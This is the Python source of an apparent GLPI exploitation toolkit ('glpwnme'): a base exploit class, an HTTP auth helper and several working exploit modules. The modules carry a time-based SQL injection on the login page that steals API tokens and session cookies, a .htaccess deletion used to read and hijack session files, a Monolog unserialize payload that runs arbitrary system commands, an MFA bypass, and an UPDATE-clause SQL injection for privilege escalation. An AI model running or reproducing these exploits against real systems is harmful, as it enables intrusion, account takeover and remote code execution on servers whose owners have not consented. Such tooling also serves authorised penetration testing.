                    return False
            else:
                return True
        return False

    def plugin_get(self, url, **kwargs):
        """
        Shortcut for get method on plugin endpoint
        """
        if not self.endpoint:
            raise ValueError("No endpoint set for using PluginExploit::plugin_get method")
        plugin_url = f"/{self.endpoint}/{self.__class__.plugin_name}" + "/" + url.lstrip("/")
        return self.get(plugin_url, **kwargs)

    def plugin_post(self, url, **kwargs):
        """
        Shortcut for post method on plugin endpoint
        """
        if not self.endpoint:
            raise ValueError("No endpoint set for using PluginExploit::plugin_post method")
        plugin_url = f"/{self.endpoint}/{self.__class__.plugin_name}" + "/" + url.lstrip("/")
        return self.post(plugin_url, **kwargs)

    def get_plugin_version(self):
        """
        Function that retrieve the version of the plugin
        By default this function return the version of plugin_name.xml
        """
        return self._get_version_from_xml()

    def check(self):
        """
        Default check method for a plugin exploit
        The check method will also set the endpoint attr of the object

        If the plugin version is not found, it will be considered as vulnerable
        """
        if not self.exists():
            return False

        if self.requirements.plugin_version.is_default():
            return True

        self.glpi_plugin_version = self.get_plugin_version()
        if not self.glpi_plugin_version:
            Log.log("Cannot found the version of the [b]existing[/b] "
                    f"plugin: [b]{self.__class__.plugin_name}[/b]")
            return True

        Log.log(f"Plugin {self.__class__.plugin_name} version [gold3]{self.glpi_plugin_version}[/] found")
        if self._is_plugin_vulnerable(self.glpi_plugin_version):
            return True
        return False



import time
from http import HTTPStatus
from rich import print as rp
from ..exploit import GlpiExploit
from glpwnme.exploits.sql_injection_mixin import SqlInjectionMixin
from glpwnme.exploits.logger import Log
from glpwnme.exploits.utils import LoginResult

class CVE_2022_31061(GlpiExploit, SqlInjectionMixin):
    """
    Sql injection on login page

    @author Therob89
    @cvss 7.4
    @name CVE_2022_31061
    """
    min_version = "9.3"
    max_version = "10.0.2"
    _impacts = "SQLi, Database Disclosure, Authent Bypass"
    sleep_time = "3"
    _is_check_opsec_safe = False # Check is not opsec safe as it update some table fields

    def send_payload(self, payload):
        """
        Send the payload

        :param payload: The payload sql to send
        :type payload: str
        """
        others = {"auth": f"ldap-1' UNION SELECT IF(({payload}), SLEEP({self.sleep_time}), 0) # ", "noAUTO": "0"}
        self.start_time = time.time()
        self.glpi_session.login("tech", "test", others=others, verbose=False)

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allow you to exploit a SQL Injection on the login page.\n"
        infos += "The SQL injection is a blind one.\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Try to list api_token in the app with a sleep_time of 3s[/]\n"
        infos += "--run -O sleep_time=3\n"
        infos += "\nExploit is [green b]Safe[/]"
        return infos

    def check_result(self, res):
        """
        Check if the payload worked given a result

        :return: The result of the injection
        :rtype: bool
        """
        if time.time() - self.start_time > float(self.sleep_time):
            return True
        return False

    def check(self):
        """
        Check if the target is vulnerable to the Sql Injection
        vulnerability
        """
        endpoint = "/front/login.php"
        others = {"auth": "ldap-1' UNION SELECT SLEEP(3) # ", "noAUTO": "0"}
        start_time = time.time()
        self.glpi_session.login("tech", "test", others=others, verbose=False)
        if time.time() - start_time >= 3.0:
            return True
        return False

    def run(self, sleep_time=None):
        """
        Run the sql exploit
        """
        if sleep_time:
            self.sleep_time = sleep_time

        tokens = self.enum_api_token_available()
        if tokens:
            Log.log(f"Trying to login with api token")
            for token in tokens:
                if self.glpi_session.login("DONTEXISTS", "test", others={"user_token": token}) == LoginResult.SUCCESS:
                    Log.msg(f"Success, here is your cookie:\n\t - {'; '.join(self.glpi_session.get_login_cookie())}")
                else:
                    Log.err(f"Error while login")
        else:
            Log.err(f"No api token in the DB ...")




import re
from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.utils import GlpiUtils
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup

class CVE_2020_15175(GlpiExploit):
    """
    Exploit that can remove a file in a specific folder
    Shall result in authent bypass

    @author SchneiderSec
    @name CVE_2020_15175
    @cvss 7.4
    """
    min_version = "0.70"
    max_version = "9.5.2"
    _impacts = "File Deletion, Authentication Bypass, File Delete, Possible RCE"
    _description = "Allows to delete the .htacces file that prevents access to the _sessions and other sensitives files"
    profiles_available = "Super-Admin|Read-Only|Self-Service|Observer|Admin|Hotliner|Technician|Supervisor"

    def _parse_apache_dir(self, dir_content):
        """
        Parse the directory of apache, order by size DESC

        :param dir_content: The result of the html content of the dir
        :type dir_content: str

        :return: The file contained on the dir with their size
        :rtype: Dict[str, List[str]]
        """
        directory_content = {}
        soup = BeautifulSoup(dir_content, "html.parser")
        table = soup.find("table")
        if not table:
            Log.err("Cannot parse Apache directory, [red]no table found[/red]")
            return directory_content

        rows = table.findChildren(["tr"])
        for row in rows:
            cols = row.find_all(["td"])
            for ressource in cols:
                ref = GlpiUtils.extract_attr(ressource.find(["a"]), "href")
                if ref:
                    directory_content[ref] = cols[-2].text
        return directory_content

    def _get_session_priv(self, session_content):
        """
        Recover the session privilege from
        the session content

        :param session_content: The content of the current session
        :type session_content: str
        """
        privs = []
        if session_content.find("glpiprofiles|") == -1:
            return ["Unauthenticated"]

        session_splitted = session_content.split('|')
        for i,obj in enumerate(session_splitted):
            if(obj.find("glpiprofiles") != -1 and i+1 < len(session_splitted)):
                sess_regex = re.compile(rf's:4:"name";s:\d+:"({self.profiles_available})"', re.I)
                return re.findall(sess_regex, session_splitted[i+1])

        return ["Unauthenticated"]

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allow you to remove the file [i]'.htaccess'[/i] in the files directory\n"
        infos += "You can then access all the session and hijack them, to become another user\n"

        infos += "\nExploit is [red b]Dangerous[/]"
        return infos

    def check(self):
        """
        Check if the target instance of glpi is vulnerable to
        this exploit or not

        :return: Whether or not the check succeed
        :rtype: bool
        """
        endpoint = "/front/pluginimage.send.php?plugin=..&name=.htaccess"
        res = self.get(endpoint, allow_redirects=False)
        if(res.status_code == HTTPStatus.OK and "security" not in res.text):
            return True
        return False

    def run(self):
        """
        Exploit the vulnerability to delete the .htaccess
        file
        """
        endpoint = "/front/pluginimage.send.php?plugin=..&name=.htaccess&clean"
        Log.log("Cleaning the .htaccess file")
        Log.log(f"Reset .htaccess content:\n" + GlpiUtils.get_htaccess_content())
        self.get(endpoint)
        self._write_log(".htaccess deleted in /files/")
        all_sessions = self.get("/files/_sessions/?C=S;O=D")
        if all_sessions.status_code == HTTPStatus.FORBIDDEN:
            Log.err("Cannot list /files/_sessions dir")
            return

        sessions_dict = self._parse_apache_dir(all_sessions.text)
        for sess in sessions_dict.keys():
            if not sess.startswith("sess_"):
                continue
            sess_content = self.get(f"/files/_sessions/{sess}")
            sessions_privs = self._get_session_priv(sess_content.text)
            str_privs = ' | '.join(sessions_privs)
            if 'Super-Admin' in sessions_privs:
                str_privs = f"[b red]{str_privs}[/b red]"
            Log.pad().msg(f"Session: {sess[5:]} --> {str_privs}")

        




import requests
from packaging import version
from abc import ABC, abstractmethod
from rich.table import Table
from glpwnme.exploits.logger import Log
from .requirements import VersionRequirement, DefaultVersion, Requirements
from .metadatas import Metadata
from .privileges import Privs
from .utils import GlpiUtils, LoginResult
from .exceptions import ExploitNotOpsecException

class GlpiExploit(ABC):
    """
    This class implements the base class
    for a glpi exploit
    """
    def __init__(self, glpi_session):
        self.glpi_session = glpi_session
        self.__init_metadatas()
        self.__init_requirements()
        self.__init_privileges()
        self.__init_impact()

    def _on_before_check(self):
        """
        Before any check, login to the target instance if needed, and
        verify that the privileges are those required

        :raises ValueError: If no rcedentials has been provided but required
            or if login failed

        :return: Whether or not everything is set up
        :rtype: bool

        TODO: check privileges of the user when logged in
        """
        if self.privilege.value == 0:
            return True

        login_status = self.glpi_session.login_with_credentials()
        if login_status:
            return True

        raise ValueError("Login failed")

    def _on_after_check(self):
        """
        Once the check has been done, logout
        """
        if self.privilege.value == 0:
            return True

        self.glpi_session.logout()

    def _write_log(self, msg):
        """
        Wrapper around the Log.write method

        :param msg: The message to log
        :type msg: Union[str, bytes]
        """
        if isinstance(msg, bytes):
            msg = msg.decode()

        cls_name = self.__class__.__name__
        Log.write(f"{cls_name}: {msg}")

    def start_check_workflow(self, opsec_only=True):
        """
        Start the workflow to run the
        exploit

        :param opsec_only: Whether or not to check an exploit that is not
            opsec safe
        :type opsec_only: bool

        :raises: An Exception got from the internal function

        :return: Whether or not the workflow succeed
        :rtype: bool
        """
        local_exception = None
        is_check_opsec_safe = getattr(self, "_is_check_opsec_safe", True)
        if(opsec_only and not is_check_opsec_safe):
            raise ExploitNotOpsecException("Check is not opsec safe, use --no-opsec")

        try:
            self._on_before_check()
            check_result = self.check()

        except Exception as e:
            local_exception = e
            check_result = False

        finally:
            self._on_after_check()

        if local_exception:
            raise local_exception
        return check_result

    def start_run_workflow(self, **options):
        """
        Start the workflow to run the
        exploit, will just login the user if needed.
        No logout will be proceed, as it could remove sessions cookies
        """
        self._on_before_check()
        self.run(**options)

    def start_clean_workflow(self, **options):
        """
        Start the workflow to clean the
        exploit, will just login the user if needed.
        No logout will be proceed, as it could remove sessions cookies
        """
        self._on_before_check()
        self.clean(**options)

    def _get_version_attr(self, version_name):
        """
        Recover the version from the class and returns it
        """
        min_version_name = "min_" + version_name
        max_version_name = "max_" + version_name
        if(hasattr(self, min_version_name) or hasattr(self, max_version_name)):
            min_version = getattr(self, min_version_name, DefaultVersion.minimal)
            max_version = getattr(self, max_version_name, DefaultVersion.maximal)
            if isinstance(min_version, str):
                min_version = (min_version, )
            if isinstance(max_version, str):
                max_version = (max_version, )
            if len(min_version) != len(max_version):
                raise ValueError("Versions must have the same number of parameter: "
                                 f"len({min_version}) != len({max_version})")
            return VersionRequirement(min_version=min_version,
                                      max_version=max_version)
        return VersionRequirement()

    def __init_requirements(self):
        """
        Init the requirements of the exploit if any
        By default the exploit is compatible with everything
        """
        glpi_version = self._get_version_attr("version")
        php_version = self._get_version_attr("php_version")
        plugin_version = self._get_version_attr("plugin_version")
        operating_system = getattr(self, "operating_system", "All").capitalize()
        api_required = getattr(self, "require_api", False)
        require_inventory = getattr(self, "require_inventory", False)
        self.requirements = Requirements(glpi_version=glpi_version,
                                         php_version=php_version,
                                         plugin_version=plugin_version,
                                         os_used=operating_system,
                                         api_status=api_required,
                                         require_inventory=require_inventory)

    def __init_metadatas(self):
        """
        Init the meta data of the exploit, such as:
         - author
         - CVSS score
         - description
        """
        self.metadatas = Metadata.parse_from_comment(self.__doc__)
        description = getattr(self, "_description", "")
        if not self.metadatas:
            author = getattr(self, "_author", "").title()
            name = getattr(self, "_name", "")
            cvss = float(getattr(self, "_score", 0))
            self.metadatas = Metadata(author=author,
                                      description=description,
                                      name=name,
                                      cvss=cvss)
        elif description:
            self.metadatas.description = description

    def __init_privileges(self):
        """
        Init the privileges required for the exploit
        """
        try:
            privilege_name = getattr(self, "_privilege", "Unauthenticated").capitalize().replace('-','')
            self.privilege = Privs[privilege_name]
        except KeyError:
            privs_available = Privs.list()
            unknown = getattr(self, "_privilege", "Unauthenticated").capitalize()
            Log.print(f"Error in class [bold]{self.__class__.__name__}[/bold]")
            Log.print(f"Privilege [red]{unknown}[/red] unknown, please use one of the following:")
            Log.print(" - " + "\n - ".join(privs_available))
            exit(0)

    def __init_impact(self):
        """
        Init the impacts of the exploit
        """
        try:
            self.impacts = list(map(lambda x: x.strip().title(), getattr(self, "_impacts").split(",")))
        except AttributeError:
            Log.print(f"[red]Error in class [bold]{self.__class__.__name__}[/bold][/red]")
            Log.print("_impacts is required to work correctly")
            Log.print("Example: _impacts = 'Authentication Bypass'")
            exit(0)

    def is_glpi_vulnerable(self, glpi_version):
        """
        Check if the exploit is usable given a version of glpi

        .. code-block::
            class MyExploit(GlpiExploit):
                min_version = ("9.5.0", "10.0.0")
                max_version = ("9.5.7", "10.0.21")

            my_exploit = MyExploit(...)

            my_exploit.is_glpi_vulnerable("10.0.18") # Return True
            my_exploit.is_glpi_vulnerable("10.0.22") # Return False
        """
        glpi_version = version.parse(glpi_version)
        for min_version, max_version in zip(self.requirements.glpi_version.min_version,
                                            self.requirements.glpi_version.max_version):
            min_version = version.parse(min_version)
            max_version = version.parse(max_version)
            if glpi_version >= min_version and glpi_version < max_version:
                return True
        return False

    def is_version_equal_or_above(self, target_version):
        """
        Check if version is above or equald another version
        """
        checked_version = self.glpi_session.glpi_infos.glpi_version
        if checked_version is None:
            checked_version = self.glpi_session.glpi_infos.glpi_nearest_version
            if checked_version is None:
                Log.err(f"No version found...")
                return False
        min_version = version.parse(checked_version)
        return min_version >= version.parse(target_version)

    def is_php_vulnerable(self, php_version):
        """
        Check if the exploit is usable given a version of php
        """
        php_version = version.parse(php_version)
        for min_version, max_version in zip(self.requirements.php_version.min_version,
                                            self.requirements.php_version.max_version):
            min_version = version.parse(min_version)
            max_version = version.parse(max_version)
            if php_version >= min_version and php_version < max_version:
                return True
        return False

    def is_os_compatible(self, os_in_use=None):
        """
        Check if the remote operating system is compatible with the exploit
        """
        if self.requirements.os_used == "All":
            return True
        return self.requirements.os_used == os_in_use.capitalize()

    def requirement_check(self):
        """
        Check all the necessary requirement for the exploit
        
        :rtype: bool
        """
        glpi_version = self.glpi_session.glpi_infos.glpi_version
        classname = self.__class__.__name__
        if not self.requirements.glpi_version.is_default():
            if glpi_version is not None:
                if not self.is_glpi_vulnerable(glpi_version):
                    Log.err(f"[red]{classname} Glpi version[/red] is not vulnerable")
                    return False
            else:
                Log.err(f"[red]Cannot recover glpi version, "
                   "continuing exploit anyway...[/red]")

        php_version = self.glpi_session.glpi_infos.php_version
        if not self.requirements.php_version.is_default():
            if php_version is not None:
                if not self.is_php_vulnerable(php_version):
                    Log.err(f"[red]{classname} Php version[/red] is not vulnerable")
                    return False
            else:
                Log.err(f"[red]Cannot recover php version, "
                   "continuing exploit anyway...[/red]")

        operating_system_server = self.glpi_session.glpi_infos.os_used
        if not self.is_os_compatible(operating_system_server):
            Log.err(f"[red]{classname} Os family[/red] is not vulnerable")
            return False

        api_status = self.glpi_session.glpi_infos.api_status
        if(self.requirements.api_status and not api_status):
            Log.err(f"[red]{classname} Api[/red] is not enabled")
            return False

        inventory_status = self.glpi_session.glpi_infos.inventory_status
        if(self.requirements.require_inventory and not inventory_status):
            Log.err(f"[red]{classname} Inventory[/red] is not enabled")
            return False
        return True

    def are_requirements_checked(self):
        """
        Check all the necessary requirement for the exploit
        but without any print
        
        :rtype: bool
        """
        glpi_version = self.glpi_session.glpi_infos.glpi_version
        classname = self.__class__.__name__
        if not self.requirements.glpi_version.is_default():
            if glpi_version is not None:
                if not self.is_glpi_vulnerable(glpi_version):
                    return False

        php_version = self.glpi_session.glpi_infos.php_version
        if not self.requirements.php_version.is_default():
            if php_version is not None:
                if not self.is_php_vulnerable(php_version):
                    return False

        operating_system_server = self.glpi_session.glpi_infos.os_used
        if not self.is_os_compatible(operating_system_server):
            return False

        api_status = self.glpi_session.glpi_infos.api_status
        if(self.requirements.api_status and not api_status):
            return False

        inventory_status = self.glpi_session.glpi_infos.inventory_status
        if(self.requirements.require_inventory and not inventory_status):
            return False
        return True

    def display_short(self):
        """
        Display the informations of the exploit in short
        """
        short = f"[bold]Exploit [blue]{self.metadatas.name}[/blue]:[/bold] "
        short += f"Privilege - [yellow bold]{self.privilege.name}[/yellow bold]"
        short += f", Impact - {self.impacts}"
        if self.metadatas.cvss != 0:
            short += f" ([bold]{self.metadatas.cvss}[/bold]/10)"
        Log.print(short)

    def display(self):
        """
        Display the whole details stores in the exploit
        """
        table = GlpiExploit.get_table_header()

        table.add_row(*self.get_row())
        Log.print(table)

    @staticmethod
    def get_table_header(title="Exploit"):
        """
        Return the table header to display an exploit

        :param title: The title of the table
        :type title: str

        :return: The table with its columns set
        :rtype: class:rich.Table
        """
        table = Table(title=title)

        table.add_column("Author", style="red")
        table.add_column("Name", style="cyan")
        table.add_column("Score", style="yellow")
        table.add_column("Impacts")
        table.add_column("Version")
        table.add_column("Privileges", justify="center")
        return table

    def get_row(self):
        """
        Return the row to be display in a table

        :return: The row in a tuple
        :rtype: tuple
        """
        version_banner = ""
        for min_version, max_version in zip(self.requirements.glpi_version.min_version,
                                            self.requirements.glpi_version.max_version):
            version_banner += f"{min_version} <= VERSION < {max_version}\n"
        version_banner = version_banner.replace(DefaultVersion.maximal, "[yellow]\u221E[/yellow]")

        priv = ":skull: " + self.privilege.name if self.privilege.value == 0 else self.privilege.name

        return (self.metadatas.author,
                self.metadatas.name,
                self.metadatas.cvss,
                ", ".join(self.impacts),
                version_banner,
                priv)

    def get(self, url, **kwargs):
        """
        Shortcut for self.glpi_session.get
        """
        return self.glpi_session.get(url, **kwargs)

    def post(self, url, **kwargs):
        """
        Shortcut for self.glpi_session.post
        CSRF token will be automatically updated here
        """
        return self.glpi_session.post(url, **kwargs)

    def clean(self):
        """
        The clean method is not mandatory for an exploit
        and will just log a message on the screen by default
        """
        Log.log("No [blue]clean[/blue] method implemented for this exploit")




import requests
from http import HTTPStatus
from requests.auth import HTTPBasicAuth, HTTPDigestAuth
from glpwnme.exploits.logger import Log
from glpwnme.exploits.exceptions import BadCredentialsException

class AnyAuthSession(requests.Session):
    def __init__(self, username="", password=""):
        super().__init__()
        self.username = username
        self.password = password
        self._negotiated = False  # have we picked a scheme yet?

    def __assert_authentication_worked(self, res):
        """
        Check that server authentication worked
        """
        if(self._negotiated and self.auth is not None and res.status_code == HTTPStatus.UNAUTHORIZED):
            raise BadCredentialsException("Server authentication failed")

    def request(self, method, url, **kwargs):
        # If we haven't negotiated auth yet for this session, do it now
        if not self._negotiated and self.auth is None:
            self._negotiate(method, url, **kwargs)
        return super().request(method, url, **kwargs)

    def _negotiate(self, method, url, **kwargs):
        probe_kwargs = {k: v for k, v in kwargs.items() if k != "auth"}
        resp = super().request(method, url, **probe_kwargs)

        is_auth_allowed = "WWW-Authenticate" in resp.headers.keys()
        if resp.status_code != HTTPStatus.UNAUTHORIZED:
            # no auth needed, or already authenticated (e.g. via cookies)
            self._negotiated = True
            return

        scheme = self._detect_scheme(resp)
        self.auth = self._build_auth(scheme)
        self._negotiated = True
        retry_resp = super().request(method, url, **probe_kwargs)
        self.__assert_authentication_worked(retry_resp)

    def _detect_scheme(self, response):
        auth_header = response.headers.get("WWW-Authenticate", "")
        message = f"Server requires authentication [gold3]{auth_header}[/gold3]"
        if not self.username:
            message += ", use [cyan]-su[/cyan] and [cyan]-sp[/cyan] for server credentials"
        Log.log(message)
        schemes = [s.strip().split(" ")[0].lower() for s in auth_header.split(",")]
        for pref in ("negotiate", "digest", "ntlm", "basic"):
            if pref in schemes:
                return pref
        raise ValueError(f"No supported auth scheme in: {auth_header!r}")

    def _build_auth(self, scheme):
        if scheme == "basic":
            return HTTPBasicAuth(self.username, self.password)
        if scheme == "digest":
            return HTTPDigestAuth(self.username, self.password)
        if scheme == "ntlm":
            try:
                from requests_ntlm import HttpNtlmAuth
                return HttpNtlmAuth(self.username, self.password)
            except ImportError:
                raise ImportError("Missing dependency: requests-ntlm. "
                                  "Install with: pip install requests-ntlm")
        if scheme == "negotiate":
            try:
                from requests_kerberos import HTTPKerberosAuth
                return HTTPKerberosAuth()
            except ImportError:
                raise ImportError("Missing dependency: requests-kerberos. "
                                  "Install with: pip install requests-kerberos")
        raise ValueError(f"Unsupported scheme: {scheme}")



from http import HTTPStatus
from glpwnme.exploits.plugin_exploit import PluginExploit
from glpwnme.exploits.logger import Log

class UNSERIALIZE_ORDER_2022(PluginExploit):
    """
    This CVE abuses an arbitrary unserialize in a plugin named order

    Link: https://github.com/pluginsGLPI/order/blob/2.7.6/ajax/dropdownValue.php
        unserialize from Self-Service
    Link: https://github.com/pluginsGLPI/order/blob/2.10.0/ajax/dropdownContact.php
        unserialize from central access

    @author c3l3si4n
    @cvss 8.6
    @name PLUGIN_ORDER_2022
    """
    min_version = "0.83.3"
    plugin_name = "order"
    min_plugin_version = "1.7.0"
    max_plugin_version = "2.10.1"
    _impacts = "Remote code execution from unserialize"
    _privilege = "User"

    unserialize_endpoints = (
                     "/ajax/dropdownValue.php",
                     "/ajax/dropdownContact.php"
                 )

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit abuse a classical [b]unserialize[/b] call.\n"
        infos += "It uses the pop chain 'Monolog/RCE6' from phpggc\n"
        infos += "It requires a central access on the target, which usually means [b]Admin[/b] privileges\n"
        infos += "Or a user access, if the version of the plugin is below 2.7.7\n"

        infos += "\n[u]Params:[/u]\n"
        infos += " - [i]command (default 'whoami')[/i]: The system command to execute on the target\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Execute the command `id` on the target[/]\n"
        infos += "--run -O command=id\n"

        infos += "\nExploit is [green b]Safe[/]"
        return infos

    def _plugins_exists(self, endpoint):
        """
        Check if the plugin exists given an endpoint, set the attribute to know that
        the plugin actually exists, and returns it at every other calls

        :return: True if the plugin exists, False otherwise
        :rtype: bool
        :meta: public
        """
        res = self.get(f"/{endpoint}/{self.__class__.plugin_name}/pics/bill-icon.png", allow_redirects=False)
        if res.status_code == HTTPStatus.OK:
            return True
        return False

    @staticmethod
    def _get_datas(endpoint, serialized_payload):
        """
        Return the datas to send for executing payload given the endpoint
        """
        if 'dropdownContact.php' in endpoint:
            return {"entity_restrict": serialized_payload, "suppliers_id": "0", "searchText": "IDONTEXIST"}
        return {"table": "glpi_users", "entity_restrict": serialized_payload}

    def run(self, command="whoami"):
        """
        Run the exploit on the target
        """
        if not self.check():
            Log.err("Target is not vulnerable")
            return False

        target_path = ""
        for end in self.__class__.unserialize_endpoints:
            res = self.plugin_get(end, allow_redirects=False)
            if res.status_code != HTTPStatus.NOT_FOUND:
                target_path = end
                break

        if not target_path:
            Log.err("Target is not vulnerable")
            return None

        Log.msg(f"Using payload [yellow]Monolog/RCE6[/yellow] from [b]phpggc[/b]")
        serialized_payload = b'a:2:{i:7;O:37:"Monolog\\Handler\\FingersCrossedHandler":3:{s:16:"\x00*\x00passthruLevel";i:0;s:9:"\x00*\x00buffer";a:1:{s:4:"test";a:2:{i:0;s:$command_len$:"$command$";s:5:"level";N;}}s:10:"\x00*\x00handler";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";N;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";N;s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}'
        serialized_payload = serialized_payload.replace(b"$command$", command.encode()).replace(b"$command_len$", str(len(command)).encode())

        Log.msg(f"Sending payload to execute: [blue]system('{command}')[/blue]")
        res = self.plugin_post(target_path, data=UNSERIALIZE_ORDER_2022._get_datas(target_path, serialized_payload))
        if res.status_code != HTTPStatus.OK:
            Log.err(f"Got a bad status code: HTTP {res.status_code}")
        print(res.text)



import time
from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils, LoginResult

class CVE_2026_52848(GlpiExploit):
    """
    This CVE abuse the isAPI function which fails to safely check if
    the request is related to an API call. As MFA is not applied on
    Rest API, it can be used to circumvent MFA of a user.

    @author Jrjgjk, Mayfly
    @cvss 5.2
    @name CVE_2026_52848
    """
    min_version = "11.0.0"
    max_version = "11.0.8"
    _impacts = "MFA Bypass"

    def infos(self):
        """
        Infos that will be displayed to the user when using --infos argument

        :return: The infos about this exploit (rich formatted)
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos = "This exploit abuses a failed check on the function isAPI().\n"
        infos = "With this you anyone with valid credentials can circumvent the MFA protection.\n"

        infos += "\n[u]Params:[/u]\n"
        infos += " - [i]username[/i]: Username to connect with\n"
        infos += " - [i]password[/i]: Password to connect with\n"
        infos += " - [i]auth (optionnal)[/i]: The auth to use (local, ldap, ...)\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Circumvent the MFA for the user post-only[/]\n"
        infos += "--run -O username='post-only' password='postonly'\n"

        infos += "\n[grey66]# Connect with another user which uses ldap[/]\n"
        infos += "--run -O username='testldap' password='testldap_pass' auth='ldap-1'\n"

        infos += "\nExploit is [green b]Safe[/]"
        return infos

    def run(self, username, password, auth=None):
        """
        Run the exploit on the target
        You can add any argument on this function
        """
        login_status = self.glpi_session.login(username, password, others={"auth": auth})
        if login_status == LoginResult.SUCCESS:
            Log.err("MFA is not required")
            return

        if login_status == LoginResult.FAILED:
            Log.err("Invalid credentials")
            return

        Log.log("Credentials are valid, intenting [gold3]MFA bypass[/gold3]")
        rest_api_url = self.glpi_session.r("/apirest.php/")
        login_url = self.glpi_session.r(f"/front/login.php?noAUTO=1&_={rest_api_url}")
        login_data = {"login_name": username, "login_password": password}
        if auth:
            login_data["auth"] = auth

        login_response = self.post(login_url, data=login_data)

        if not self.glpi_session._has_logged_in(login_response.url):
            Log.err(f"Exploit failed, redirected to {login_response.url}")
            return

        Log.msg("MFA [green]bypassed successfully[/green]")
        Log.msg(*self.glpi_session.get_login_cookie(), sep="; ")



import time
from http import HTTPStatus
from ..update_sql_injection_mixin import UpdateSqlInjectionMixin
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils

class CVE_2024_29889(UpdateSqlInjectionMixin):
    """
    This CVE abuse a SQL Injection in an update clause to elevate the privilege of the current user

    @author RIOUX Guilhem
    @cvss 8.1
    @name CVE_2024_29889
    """
    min_version = "10.0.0"
    max_version = "10.0.15"
    _impacts = "SQLi, Privilege Escalation, Database Leak"
    _privilege = "User"
    _is_check_opsec_safe = False # Check is not opsec safe as it update some table fields

    def __init__(self, glpi_session):
        super().__init__(glpi_session, field="savedsearches_pinned")

    def _make_payload(self, field, payload, condition):
        """
        Make the sql payload ready to be injected

        :param field: In which field to store the result
        :type field: str

        :param payload: The sql payload to use, Do not use `FROM glpi_users` inside as
          it will break the sql syntax
        :type payload: str

        :param condition: The condition which is mandatory, to not apply an update everywhere
        :type condition: str
        """
        return f'{{"jrjgjk":"exploit\', savedsearches_pinned=NULL, {field}={payload} WHERE {condition}; -- \'"}}'

    def _prepare_payload(self, payload):
        """
        Store the payload in the db

        :param payload: The payload to send
        :type payload: str
        """
        save_data = {"id": self.get_user_id(), "savedsearches_pinned": payload, "update": "Save"}
        self.post("/front/preference.php", data=save_data)

    def send_payload(self, payload):
        """
        Send the payload to the target
        In 2 times:
          1. Store the payload in the DB
          2. Trigger the payload

        :param payload: The payload to send
        :type payload: str
        """
        self._prepare_payload(payload)

        ### On oldest versions, the payload will only work after login again
        self.glpi_session.logout()
        self.glpi_session.login_with_credentials()

        return self.post("/ajax/pin_savedsearches.php", data={"itemtype": "Link"})

    def success_hook(self):
        """
        The hook reset the payload stored in this case
        """
        self._reset_field(field=self.field, condition=f"id={self.get_user_id()}")
